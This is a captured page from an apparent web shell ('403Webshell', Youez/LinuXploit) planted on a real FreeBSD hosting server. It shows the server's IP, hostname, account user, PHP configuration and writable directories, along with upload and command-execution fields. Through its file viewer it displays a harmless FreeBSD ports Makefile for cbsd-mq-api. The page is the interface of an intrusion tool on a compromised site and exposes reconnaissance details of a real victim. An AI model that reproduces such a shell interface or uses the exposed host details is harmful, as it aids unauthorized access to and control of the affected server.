403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/sysutils/cbsd-mq-api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/sysutils/cbsd-mq-api/Makefile
PORTNAME=	cbsd-mq-api
PORTVERSION=	0.3
PORTREVISION=	6
CATEGORIES=	sysutils

MAINTAINER=	olevole@olevole.ru
COMMENT=	Simplified API for creating and destroying CBSD virtual environments
WWW=		https://www.bsdstore.ru/

LICENSE=	BSD2CLAUSE

USES=		go
USE_GITHUB=	yes
GH_ACCOUNT=	cbsd
GH_TUPLE=	beanstalkd:go-beanstalk:3bed00be7a17:beanstalkd/src/github.com/beanstalkd/go-beanstalk \
		gorilla:mux:d07530f46e1e:gorilla_mux/vendor/github.com/gorilla/mux \
		golang:crypto:5ff15b29337e:golang_crypto/vendor/golang.org/x/crypto
USE_RC_SUBR=	cbsd-mq-api

USERS=		cbsd
GROUPS=		cbsd

PLIST_FILES=	bin/cbsd-mq-api \
		"@sample etc/cbsd-mq-api.json.sample"

post-extract:
	${LN} -sf ${WRKSRC}/src ${WRKDIR}
	${LN} -sf ${WRKSRC} ${WRKDIR}/src/${PORTNAME}

do-install:
	${INSTALL_PROGRAM} ${WRKDIR}/bin/${PORTNAME} ${STAGEDIR}${PREFIX}/bin/cbsd-mq-api
	${INSTALL_DATA} ${WRKDIR}/${PORTNAME}-${GH_TAGNAME}/etc/cbsd-mq-api.json ${STAGEDIR}${PREFIX}/etc/cbsd-mq-api.json.sample

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit